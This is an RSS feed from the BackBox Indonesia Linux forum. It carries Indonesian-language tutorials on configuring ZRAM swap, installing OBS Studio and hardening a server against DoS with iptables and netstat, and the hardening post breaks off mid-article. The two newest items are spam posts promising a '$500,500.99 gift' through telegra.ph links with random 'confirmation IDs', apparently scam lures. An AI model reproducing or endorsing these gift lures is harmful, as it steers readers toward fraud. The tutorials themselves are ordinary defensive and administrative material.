<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/">
	<channel>
		<title><![CDATA[BackBox Indonesia - All Forums]]></title>
		<link>https://www.backboxindonesia.or.id/</link>
		<description><![CDATA[BackBox Indonesia - https://www.backboxindonesia.or.id]]></description>
		<pubDate>Tue, 28 Apr 2026 12:01:41 +0000</pubDate>
		<generator>MyBB</generator>
		<item>
			<title><![CDATA[Receive a $500,500.99 Gift That’s Pure Generosity]]></title>
			<link>https://www.backboxindonesia.or.id/thread-249.html</link>
			<pubDate>Thu, 22 Jan 2026 17:35:50 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-249.html</guid>
			<description><![CDATA[We’re Making a &#36;500,500.99 Gift Happen for You <a href="https://telegra.ph/Get-a-gift-worth-up-to-50050099---682742-01-21" target="_blank" class="mycode_url">https://telegra.ph/Get-a-gift-worth-up-t...2742-01-21</a> <br />
 <br />
 <br />
 <br />
 <br />
 <br />
Confirmation ID: z8ur9d8c8s4b1a8ap2ol7n7d9f9c9m7af1wr0g1x7c7o0z2tf0br0v6h9q0v3l9kp4xb9i8x0h5v9f6qh0xe7f9c7y8t7j3eu9pc0d8p4w1d6m4r]]></description>
			<content:encoded><![CDATA[We’re Making a &#36;500,500.99 Gift Happen for You <a href="https://telegra.ph/Get-a-gift-worth-up-to-50050099---682742-01-21" target="_blank" class="mycode_url">https://telegra.ph/Get-a-gift-worth-up-t...2742-01-21</a> <br />
 <br />
 <br />
 <br />
 <br />
 <br />
Confirmation ID: z8ur9d8c8s4b1a8ap2ol7n7d9f9c9m7af1wr0g1x7c7o0z2tf0br0v6h9q0v3l9kp4xb9i8x0h5v9f6qh0xe7f9c7y8t7j3eu9pc0d8p4w1d6m4r]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Claim a $500,500.99 Gift That’s Totally Yours]]></title>
			<link>https://www.backboxindonesia.or.id/thread-248.html</link>
			<pubDate>Thu, 22 Jan 2026 11:35:39 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-248.html</guid>
			<description><![CDATA[GET A &#36;500,500.99 GIFT THAT’S FREE AND FABULOUS <a href="https://telegra.ph/Get-a-gift-worth-up-to-50050099---417792-01-21" target="_blank" class="mycode_url">https://telegra.ph/Get-a-gift-worth-up-t...7792-01-21</a> <br />
 <br />
 <br />
 <br />
 <br />
 <br />
Sequence: h9la5a2c7i5i7y7tq5et0q7t7p2z4d5xh1eu2h7h9z0y1n7nq5uv1z1n1r9d1g5bv4vv9w4s4u6y4d7md2zw4k1f2g7g2w4vq8yq6k7u5x0q9d5m]]></description>
			<content:encoded><![CDATA[GET A &#36;500,500.99 GIFT THAT’S FREE AND FABULOUS <a href="https://telegra.ph/Get-a-gift-worth-up-to-50050099---417792-01-21" target="_blank" class="mycode_url">https://telegra.ph/Get-a-gift-worth-up-t...7792-01-21</a> <br />
 <br />
 <br />
 <br />
 <br />
 <br />
Sequence: h9la5a2c7i5i7y7tq5et0q7t7p2z4d5xh1eu2h7h9z0y1n7nq5uv1z1n1r9d1g5bv4vv9w4s4u6y4d7md2zw4k1f2g7g2w4vq8yq6k7u5x0q9d5m]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Konfigurasi ZRAM Swap Linux]]></title>
			<link>https://www.backboxindonesia.or.id/thread-247.html</link>
			<pubDate>Fri, 24 Jan 2020 20:08:28 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-247.html</guid>
			<description><![CDATA[<span style="font-size: medium;" class="mycode_size">Hello there<br />
<br />
Saya akan share mengenai <span style="font-weight: bold;" class="mycode_b">ZRam Swap Linux<br />
</span><br />
Apa itu Zram ?</span><br />
<div style="text-align: justify;" class="mycode_align"><span style="font-size: medium;" class="mycode_size">Zram adalah modul kernel linux atau Virtual Memory Compression yang terletak pada block device dengan ukuran yang disesuaikan oleh system namun dapat juga kita mengatur ukuran dari zram swap tersebut. Zram menggunakan fast compression dengan algoritma (LZ4) sehingga data yang masuk ke dalam zram swap kan di kompresi dan disimpan ke dalam RAM.<br />
<br />
Zram menjadi alternatif swap partisi bagi yang tidak mau mengorbankan partisi <span style="font-weight: bold;" class="mycode_b">Hardisk</span> atau <span style="font-weight: bold;" class="mycode_b">SSD, </span>Zram biasanya terletak pada /sys/block/zram0 dan swap partisiny ada pada /dev/block/zram0.<br />
<br />
Pada kenyataan nya <span style="font-weight: bold;" class="mycode_b">SWAP</span> tetap dibutuhkan bagi mereka yang mempunyai RAM kecil maupun RAM besar dengan multitasking yang tinggi "menjalankan proram berat seperti android studio dan lainya". <br />
<br />
Bagaimana konfigurasi Zram swap linux ?<br />
<br />
<span style="font-weight: bold;" class="mycode_b">1. Buatlah ZRAM block device </span><br />
</span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>sudo modprobe zram</code></div></div><span style="font-size: medium;" class="mycode_size"><br />
<span style="font-weight: bold;" class="mycode_b">2. Set Zram dengan kompresi tinggi dengan menggunakan algoritma </span><br />
</span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>sudo sh -c "echo 'lz4' &gt; /sys/block/zram0/comp_algorithm"</code></div></div><span style="font-size: medium;" class="mycode_size"><br />
<span style="font-weight: bold;" class="mycode_b">3. Set 2 Gigabyte untuk swap file </span><br />
</span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>sudo sh -c "echo '2G' &gt; /sys/block/zram0/disksize"</code></div></div><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Note</span> : Kalian bisa set file sesuai dengan keinginan.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">4. Aktifkan zram swap block device</span><br />
</span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>sudo mkswap --label zram0 /dev/zram0</code></div></div><span style="font-size: medium;" class="mycode_size"><br />
5. Aktifkan zram swap block device dengan prioritas tinggi<br />
</span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>sudo swapon --priority 100 /dev/zram0</code></div></div></div>
<span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Note</span> : Kalian bisa mengatur priotas sesuai dengan keinginan.<br />
<br />
6. Cek apakah Zram swap sudah dibuat dengan perintah <br />
</span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>free -h</code></div></div><span style="font-size: medium;" class="mycode_size"><br />
Lihat gambar berikut <br />
</span><br />
<div style="text-align: left;" class="mycode_align"><a href="https://ibb.co/LC5VY1z" target="_blank" class="mycode_url"><img src="https://i.ibb.co/nDCx6js/Deepin-Screenshot-dde-desktop-20200125025244.png" alt="[Image: Deepin-Screenshot-dde-desktop-20200125025244.png]" class="mycode_img" /></a><br />
<span style="font-size: small;" class="mycode_size">Desc : Zram swap telah di buat dengan size 2 Gb.</span><br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Note : Zram akan hilang ketika Laptop/PC di restart, untuk itu di perlukan konfigurasi agar zram aktif pada saat laptop/pc di restart.<br />
</span><br />
<span style="font-weight: bold;" class="mycode_b">1. Buatlah file zram.service pada lokasi /etc/systemd/system/ </span><br />
</span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>sudo nano /etc/systemd/system/zram.service</code></div></div><span style="font-size: medium;" class="mycode_size"><br />
<span style="font-weight: bold;" class="mycode_b">2. Masukan script berikut </span><br />
</span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>[Unit] <br />
Description=zRam block devices swapping <br />
 <br />
[Service] <br />
Type=oneshot <br />
ExecStart=/usr/bin/bash -c "modprobe zram &amp;&amp; echo lz4 &gt; /sys/block/zram0/comp_algorithm &amp;&amp; echo 2G &gt; /sys/block/zram0/disksize &amp;&amp; mkswap --label zram0 /dev/zram0 &amp;&amp; swapon --priority 100 /dev/zram0" <br />
ExecStop=/usr/bin/bash -c "swapoff /dev/zram0 &amp;&amp; rmmod zram" <br />
RemainAfterExit=yes <br />
 <br />
[Install] <br />
WantedBy=multi-user.target</code></div></div><span style="font-size: medium;" class="mycode_size"><br />
<span style="font-weight: bold;" class="mycode_b">3. Aktifkan zram.service agar berjalan pada saat startup<br />
</span></span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>sudo systemctl enable zram</code></div></div></div>
<span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Done !!!!</span><br />
<br />
Cara menonaktifkan zram block device<br />
</span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>sudo swapoff /dev/zram0</code></div></div><span style="font-size: medium;" class="mycode_size"><br />
Cara menghapus zram dari kernel <br />
</span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>sudo rmmod zram</code></div></div><span style="font-size: medium;" class="mycode_size"><br />
Cara menonaktifkan zram agar tidak berjalan pada startup<br />
</span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>sudo systemctl disable zram.service</code></div></div><span style="font-size: medium;" class="mycode_size"><br />
<br />
Cheer's EDELWIS<br />
</span>]]></description>
			<content:encoded><![CDATA[<span style="font-size: medium;" class="mycode_size">Hello there<br />
<br />
Saya akan share mengenai <span style="font-weight: bold;" class="mycode_b">ZRam Swap Linux<br />
</span><br />
Apa itu Zram ?</span><br />
<div style="text-align: justify;" class="mycode_align"><span style="font-size: medium;" class="mycode_size">Zram adalah modul kernel linux atau Virtual Memory Compression yang terletak pada block device dengan ukuran yang disesuaikan oleh system namun dapat juga kita mengatur ukuran dari zram swap tersebut. Zram menggunakan fast compression dengan algoritma (LZ4) sehingga data yang masuk ke dalam zram swap kan di kompresi dan disimpan ke dalam RAM.<br />
<br />
Zram menjadi alternatif swap partisi bagi yang tidak mau mengorbankan partisi <span style="font-weight: bold;" class="mycode_b">Hardisk</span> atau <span style="font-weight: bold;" class="mycode_b">SSD, </span>Zram biasanya terletak pada /sys/block/zram0 dan swap partisiny ada pada /dev/block/zram0.<br />
<br />
Pada kenyataan nya <span style="font-weight: bold;" class="mycode_b">SWAP</span> tetap dibutuhkan bagi mereka yang mempunyai RAM kecil maupun RAM besar dengan multitasking yang tinggi "menjalankan proram berat seperti android studio dan lainya". <br />
<br />
Bagaimana konfigurasi Zram swap linux ?<br />
<br />
<span style="font-weight: bold;" class="mycode_b">1. Buatlah ZRAM block device </span><br />
</span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>sudo modprobe zram</code></div></div><span style="font-size: medium;" class="mycode_size"><br />
<span style="font-weight: bold;" class="mycode_b">2. Set Zram dengan kompresi tinggi dengan menggunakan algoritma </span><br />
</span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>sudo sh -c "echo 'lz4' &gt; /sys/block/zram0/comp_algorithm"</code></div></div><span style="font-size: medium;" class="mycode_size"><br />
<span style="font-weight: bold;" class="mycode_b">3. Set 2 Gigabyte untuk swap file </span><br />
</span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>sudo sh -c "echo '2G' &gt; /sys/block/zram0/disksize"</code></div></div><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Note</span> : Kalian bisa set file sesuai dengan keinginan.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">4. Aktifkan zram swap block device</span><br />
</span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>sudo mkswap --label zram0 /dev/zram0</code></div></div><span style="font-size: medium;" class="mycode_size"><br />
5. Aktifkan zram swap block device dengan prioritas tinggi<br />
</span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>sudo swapon --priority 100 /dev/zram0</code></div></div></div>
<span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Note</span> : Kalian bisa mengatur priotas sesuai dengan keinginan.<br />
<br />
6. Cek apakah Zram swap sudah dibuat dengan perintah <br />
</span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>free -h</code></div></div><span style="font-size: medium;" class="mycode_size"><br />
Lihat gambar berikut <br />
</span><br />
<div style="text-align: left;" class="mycode_align"><a href="https://ibb.co/LC5VY1z" target="_blank" class="mycode_url"><img src="https://i.ibb.co/nDCx6js/Deepin-Screenshot-dde-desktop-20200125025244.png" alt="[Image: Deepin-Screenshot-dde-desktop-20200125025244.png]" class="mycode_img" /></a><br />
<span style="font-size: small;" class="mycode_size">Desc : Zram swap telah di buat dengan size 2 Gb.</span><br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Note : Zram akan hilang ketika Laptop/PC di restart, untuk itu di perlukan konfigurasi agar zram aktif pada saat laptop/pc di restart.<br />
</span><br />
<span style="font-weight: bold;" class="mycode_b">1. Buatlah file zram.service pada lokasi /etc/systemd/system/ </span><br />
</span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>sudo nano /etc/systemd/system/zram.service</code></div></div><span style="font-size: medium;" class="mycode_size"><br />
<span style="font-weight: bold;" class="mycode_b">2. Masukan script berikut </span><br />
</span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>[Unit] <br />
Description=zRam block devices swapping <br />
 <br />
[Service] <br />
Type=oneshot <br />
ExecStart=/usr/bin/bash -c "modprobe zram &amp;&amp; echo lz4 &gt; /sys/block/zram0/comp_algorithm &amp;&amp; echo 2G &gt; /sys/block/zram0/disksize &amp;&amp; mkswap --label zram0 /dev/zram0 &amp;&amp; swapon --priority 100 /dev/zram0" <br />
ExecStop=/usr/bin/bash -c "swapoff /dev/zram0 &amp;&amp; rmmod zram" <br />
RemainAfterExit=yes <br />
 <br />
[Install] <br />
WantedBy=multi-user.target</code></div></div><span style="font-size: medium;" class="mycode_size"><br />
<span style="font-weight: bold;" class="mycode_b">3. Aktifkan zram.service agar berjalan pada saat startup<br />
</span></span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>sudo systemctl enable zram</code></div></div></div>
<span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Done !!!!</span><br />
<br />
Cara menonaktifkan zram block device<br />
</span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>sudo swapoff /dev/zram0</code></div></div><span style="font-size: medium;" class="mycode_size"><br />
Cara menghapus zram dari kernel <br />
</span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>sudo rmmod zram</code></div></div><span style="font-size: medium;" class="mycode_size"><br />
Cara menonaktifkan zram agar tidak berjalan pada startup<br />
</span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>sudo systemctl disable zram.service</code></div></div><span style="font-size: medium;" class="mycode_size"><br />
<br />
Cheer's EDELWIS<br />
</span>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[OBS Studio alternative screen video recording]]></title>
			<link>https://www.backboxindonesia.or.id/thread-246.html</link>
			<pubDate>Fri, 24 Jan 2020 19:06:21 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-246.html</guid>
			<description><![CDATA[<span style="font-size: medium;" class="mycode_size">Hello dear</span><br />
<br />
<span style="font-size: medium;" class="mycode_size">Saya mau share alternatif screen video recording selain Kazam, Simple Screen Recoder dan Record my desktop.</span><br />
<br />
<span style="font-size: medium;" class="mycode_size">OBS Studio adalah perekam layar dan juga bisa streaming pada platform :</span><br />
<br />
<ol type="1" class="mycode_list">
</li>
<li><span style="font-size: medium;" class="mycode_size">Youtube</span><br />
</li>
<li><span style="font-size: medium;" class="mycode_size">Twitch</span><br />
</li>
<li><span style="font-size: medium;" class="mycode_size">Facebook</span><br />
</li>
<li><span style="font-size: medium;" class="mycode_size">Mixer.com</span><br />
</li>
<li><span style="font-size: medium;" class="mycode_size">Twitter</span><br />
</li></ol>
<span style="font-size: medium;" class="mycode_size">Obs studio bisa merekam dengan resolusi 4K dengan berbagai format output seperti MP4, FLV, MKV dan AVI, kalian bisa mengatur FPS sesuai yang diinginkan dari 30 FPS, 60 FPS, 90 FPS sampai 120 FPS. OBS juga dapat melakukan 2 hal yaitu streaming online dan bisa recording pada saat streaming berlangsung.</span><br />
<br />
<span style="font-size: medium;" class="mycode_size">kalian bisa lihat informasi dari situs nya langsung pada link berikut <a href="https://obsproject.com/" target="_blank" class="mycode_url">OBS STUDIO</a></span><br />
<br />
<br />
<span style="font-size: medium;" class="mycode_size">cara install Obs Studio </span><br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: medium;" class="mycode_size">1. Ubuntu/Backbox installation</span></span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>sudo apt-get install ffmpeg<br />
<br />
Setelah itu tambahkan repository obs studio dengan cara :<br />
<br />
sudo add-apt-repository ppa:obsproject/obs-studio<br />
sudo apt-get update<br />
sudo apt-get install obs-studio</code></div></div><br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: medium;" class="mycode_size">2. Debian installation </span></span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>sudo apt install obs-studio</code></div></div><br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: medium;" class="mycode_size">3. Arch/Manjaro installation</span></span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>sudo pacman -S obs-studio</code></div></div><br />
<span style="font-size: medium;" class="mycode_size">Note : untuk manjaro sebaik nya mengaktifkan repository AUR <br />
</span><br />
<div style="text-align: center;" class="mycode_align"><span style="font-size: small;" class="mycode_size">Screenshots</span></div>
<div style="text-align: center;" class="mycode_align"><a href="https://ibb.co/cwJnWhX" target="_blank" class="mycode_url"><img src="https://i.ibb.co/zFsv3VH/Deepin-Screenshot-select-area-20200125015411.png" alt="[Image: Deepin-Screenshot-select-area-20200125015411.png]" class="mycode_img" /></a></div>
<br />
<span style="font-size: medium;" class="mycode_size">untuk instalasi distro linux lain nya bisa mengunjungi <span style="font-weight: bold;" class="mycode_b"><a href="https://obsproject.com/wiki/install-instructions" target="_blank" class="mycode_url">WIKI INSTALLATION</a></span></span><br />
<br />
<br />
<br />
<br />
<br />
<span style="font-size: medium;" class="mycode_size">Cheer's EDELWIS</span>]]></description>
			<content:encoded><![CDATA[<span style="font-size: medium;" class="mycode_size">Hello dear</span><br />
<br />
<span style="font-size: medium;" class="mycode_size">Saya mau share alternatif screen video recording selain Kazam, Simple Screen Recoder dan Record my desktop.</span><br />
<br />
<span style="font-size: medium;" class="mycode_size">OBS Studio adalah perekam layar dan juga bisa streaming pada platform :</span><br />
<br />
<ol type="1" class="mycode_list">
</li>
<li><span style="font-size: medium;" class="mycode_size">Youtube</span><br />
</li>
<li><span style="font-size: medium;" class="mycode_size">Twitch</span><br />
</li>
<li><span style="font-size: medium;" class="mycode_size">Facebook</span><br />
</li>
<li><span style="font-size: medium;" class="mycode_size">Mixer.com</span><br />
</li>
<li><span style="font-size: medium;" class="mycode_size">Twitter</span><br />
</li></ol>
<span style="font-size: medium;" class="mycode_size">Obs studio bisa merekam dengan resolusi 4K dengan berbagai format output seperti MP4, FLV, MKV dan AVI, kalian bisa mengatur FPS sesuai yang diinginkan dari 30 FPS, 60 FPS, 90 FPS sampai 120 FPS. OBS juga dapat melakukan 2 hal yaitu streaming online dan bisa recording pada saat streaming berlangsung.</span><br />
<br />
<span style="font-size: medium;" class="mycode_size">kalian bisa lihat informasi dari situs nya langsung pada link berikut <a href="https://obsproject.com/" target="_blank" class="mycode_url">OBS STUDIO</a></span><br />
<br />
<br />
<span style="font-size: medium;" class="mycode_size">cara install Obs Studio </span><br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: medium;" class="mycode_size">1. Ubuntu/Backbox installation</span></span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>sudo apt-get install ffmpeg<br />
<br />
Setelah itu tambahkan repository obs studio dengan cara :<br />
<br />
sudo add-apt-repository ppa:obsproject/obs-studio<br />
sudo apt-get update<br />
sudo apt-get install obs-studio</code></div></div><br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: medium;" class="mycode_size">2. Debian installation </span></span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>sudo apt install obs-studio</code></div></div><br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: medium;" class="mycode_size">3. Arch/Manjaro installation</span></span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>sudo pacman -S obs-studio</code></div></div><br />
<span style="font-size: medium;" class="mycode_size">Note : untuk manjaro sebaik nya mengaktifkan repository AUR <br />
</span><br />
<div style="text-align: center;" class="mycode_align"><span style="font-size: small;" class="mycode_size">Screenshots</span></div>
<div style="text-align: center;" class="mycode_align"><a href="https://ibb.co/cwJnWhX" target="_blank" class="mycode_url"><img src="https://i.ibb.co/zFsv3VH/Deepin-Screenshot-select-area-20200125015411.png" alt="[Image: Deepin-Screenshot-select-area-20200125015411.png]" class="mycode_img" /></a></div>
<br />
<span style="font-size: medium;" class="mycode_size">untuk instalasi distro linux lain nya bisa mengunjungi <span style="font-weight: bold;" class="mycode_b"><a href="https://obsproject.com/wiki/install-instructions" target="_blank" class="mycode_url">WIKI INSTALLATION</a></span></span><br />
<br />
<br />
<br />
<br />
<br />
<span style="font-size: medium;" class="mycode_size">Cheer's EDELWIS</span>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Meminimalisir serangan dos/ddos pada server]]></title>
			<link>https://www.backboxindonesia.or.id/thread-245.html</link>
			<pubDate>Wed, 08 May 2019 13:50:32 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-245.html</guid>
			<description><![CDATA[Hallo kembali lagi dengan saya di sini,<br />
Untuk melanjutkan artikel sebelumnya tentang <a href="https://www.backboxindonesia.or.id/thread-244.html" target="_blank" class="mycode_url">cara mengamankan server dari berbagai serangan</a>.<br />
Di post kali ini saya akan membahas bagaimana cara meminimalisir serangan DOS/DDOS pada server yang kita kelola secara teknisnya.<br />
Yang akan kita bahas kali ini adalah:<br />
<br />
<ol type="1" class="mycode_list">
</li>
<li>Blok traffic masuk ICMP<br />
</li>
<li>Blok IP yang di sinyalir membahayakan server dengan iptables<br />
</li>
<li>Batasi jumlah traffic masuk pada server<br />
</li>
<li>Tutup port yang tidak di perlukan<br />
</li>
<li>Batasi ukuran file yang di upload<br />
</li>
<li>Pasang IDS &amp; IPS untuk meminimalisir serangan<br />
</li></ol>
<br />
<span style="font-weight: bold;" class="mycode_b">Pertama:</span><br />
Oke langsung saja ke bahasan pertama yaitu mem blok traffic masuk ICMP.<br />
Kenapa ICMP harus di batasi??<br />
Karena perlu kita ketahui juga dalam serangan DOS/DDOS itu ada namanya teknik "Ping of death" atau bisa di sebut sebagai serangan yang di tujukan pada protokol ICMP.<br />
Untuk cara menangkalnya cukup mudah, kita hanya menambahkan rule iptables saja.<br />
Tetapi sebelum mengeksekusi perintahnya kita harus menggunakan user <span style="color: #ff3333;" class="mycode_color">root</span> terlebih dahulu.<br />
Perintahnya kurang lebih seperti ini<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; iptables -A INPUT -p icmp --icmp-type echo-request -j DROP</code></div></div><br />
dan jika kalian ingin menghapus rute tersebut cukup mengganti "-A" menjadi "-D".<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; iptables -D INPUT -p icmp --icmp-type echo-request -j DROP</code></div></div><br />
Cukup mudah bukan?? :)<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Kedua:</span><br />
Oke kita lanjut ke pembahasan kedua, yaitu membloking ip address yang di sinyalir membahayakan server.<br />
Seperti biasa tools yang di gunakan masih menggunakan iptables.<br />
Perintahnya serperti ini<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; iptables -A INPUT -s ipaddress -j DROP</code></div></div><br />
Sebagai contoh kita akan memblok ip 1.1.1.1, dan perintahnya seperti ini.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; iptables -A INPUT -s 1.1.1.1 -j DROP</code></div></div><br />
Seperti pembahasan di atas, jika kita ingin meng unblock tinggal mengganti "-A" menjadi "-D".<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; iptables -D INPUT -s 1.1.1.1 -j DROP</code></div></div><br />
Sudah mulai sedikit paham dengan iptables?? :)<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Ketiga:</span><br />
Lanjut ke pembahasan ke tiga yaitu tentang cara membatasi maksimal request yang masuk.<br />
Kali ini masih seputar iptables, dan tidak perlu lagi seting di webserver.<br />
Tujuannya yaitu menghidari bruteforce, DOS/DDOS pada web server, dan bisa juga di terapkan ke service yang lain.<br />
Sebagai contoh bisa di terapkan juga ke port ssh agar tidak terjadi serangan bruterforce secara berturut turut.<br />
Ketika ada salah satu ip yang mencoba mem bruteforce maka ip tersebut akan di block oleh iptables untuk sementara.<br />
Perintahnya kurang lebih seperti ini<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; iptables -I INPUT -p tcp --dport [port] -i [interface] -m state --state NEW -m recent --set<br />
&#36; iptables -I INPUT -p tcp --dport [port] -i [interface] -m state --state NEW -m recent  --update --seconds [waktu] --hitcount 4 -j DROP</code></div></div><br />
Keterangan:<br />
[port] = port yang akan kita batasi koneksinya<br />
[interface] = interface jaringan yang di gunakan pada server<br />
[waktu] = waktu tunggu setelah di blok oleh ip tables<br />
<br />
Sebagai contoh apabila di server kita mempunyai 3 port yang di buka maka perintahnya seperti ini<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; iptables -I INPUT -p tcp --dport 22 -i ens3 -m state --state NEW -m recent --set<br />
&#36; iptables -I INPUT -p tcp --dport 80 -i ens3 -m state --state NEW -m recent --set<br />
&#36; iptables -I INPUT -p tcp --dport 443 -i ens3 -m state --state NEW -m recent --set<br />
&#36; iptables -I INPUT -p tcp --dport 22 -i ens3 -m state --state NEW -m recent  --update --seconds 60 --hitcount 4 -j DROP<br />
&#36; iptables -I INPUT -p tcp --dport 80 -i ens3 -m state --state NEW -m recent  --update --seconds 60 --hitcount 4 -j DROP<br />
&#36; iptables -I INPUT -p tcp --dport 443 -i ens3 -m state --state NEW -m recent  --update --seconds 60 --hitcount 4 -j DROP</code></div></div><br />
Port 22 = SSH<br />
Port 80 = Web server<br />
Port 443 = Web server<br />
ens3 = Interface jaringan<br />
<br />
Kurang lebih seperti itu teknisnya dalam membatasi koneksi yang masuk pada server menggunakan iptables.<br />
Dan jangan lupa juga kalau kita sudah menginput rule iptables di atas, kita harus menyimpan rule tersebut dengan perintah iptables-save.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; iptables-save</code></div></div><br />
<br />
<span style="font-weight: bold;" class="mycode_b">Keempat:</span><br />
Untuk tahap ke empat yaitu menutup port yang tidak terpakai.<br />
Kali ini caranya agak sedikit berbeda, yang di mana sebelum mematikan service kita harus mengecek terlebih dahulu port yang terbuka dengan netstat.<br />
Perintah dasarnya seperti ini<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; netstat -ntlp</code></div></div><br />
Untuk melihat service apa saja yang di jalankan, kita harus menggunakan user root agar bisa terlihar name servicenya.<br />
Karena kalo kita menjalankan netstat menggunakan user biasa, nama service dan nomer pid nya tidak akan muncul di outputnya.<br />
<br />
Setelah kita mengetahui pid dan port mana yang tidak terpakai, tahap selanjutnya adalah memberhentikan service tersebut.<br />
Sebagai contoh<br />
<br />
<img src="https://i.ibb.co/FmbT02L/Screenshot-2019-05-08-20-20-41.png" alt="[Image: Screenshot-2019-05-08-20-20-41.png]" class="mycode_img" /><br />
<br />
Di gambar tersebut terlihat service haproxy dan python yang sedang berjalan tetapi proses tersebut sebenernya tidak terpakai.<br />
Selain itu juga port 31337 itu adalah port backdoor (bind shell), dan ini yang akan menyebabkan server kita menjadi tidak aman.<br />
Untuk cara memberhentikan service dan backdoor tersebut ada banyak cara, yang pertama memberhentikan terlebih dahulu service haproxy yang sedang berjalan dengan cara seperti ini.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; /etc/init.d/haproxy stop<br />
<br />
atau<br />
<br />
&#36; systemctl stop haproxy</code></div></div><br />
Kemudian cara selanjutnya yaitu mendisable service tersebut saat restart dengan perintah ini.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; systemctl disable haproxy</code></div></div><br />
Selanjutnya jika service yang berjalan tidak ada di dalam systemctl atau init.d kita bisa mematikan proses secara paksa dengan perintah ini.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; kill -9 &lt;pid&gt;</code></div></div><br />
&lt;pid&gt; ini adalah pid proses yang keluar di dalam output netstat tadi, sebagai contoh pid yang menjalankan python yaitu 5615 dan perintahnya seperti ini.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; kill -9 5615</code></div></div><br />
Kalo kalian sudah terbiasa dengan perintah linux pastinya cara ini sangat mudah di lakukan. :)<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Kelima:</span><br />
